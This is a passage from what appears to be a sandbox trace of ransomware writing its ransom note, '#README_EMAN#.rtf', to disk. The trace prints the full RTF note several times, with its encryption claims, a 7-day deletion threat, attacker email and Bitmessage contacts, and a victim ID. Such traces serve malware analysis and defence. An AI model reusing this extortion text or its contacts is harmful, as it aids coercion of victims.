decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\ns is denied\r\nOPER_BTO: Ó:", lpUsedDefaultChar=0x0) returned 8717 [0265.707] WriteFile (in: hFile=0x2ec, lpBuffer=0x38bbe68*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x38bbe68*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0265.708] CloseHandle (hObject=0x2ec) returned 1 [0265.708] GetFileAttributesW (lpFileName="C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\#README_EMAN#.rtf" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\#readme_eman#.rtf")) returned 0xffffffff [0265.708] GetLastError () returned 0x2 [0265.708] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\#README_EMAN#.rtf" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0267.311] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0267.311] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0267.311] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a 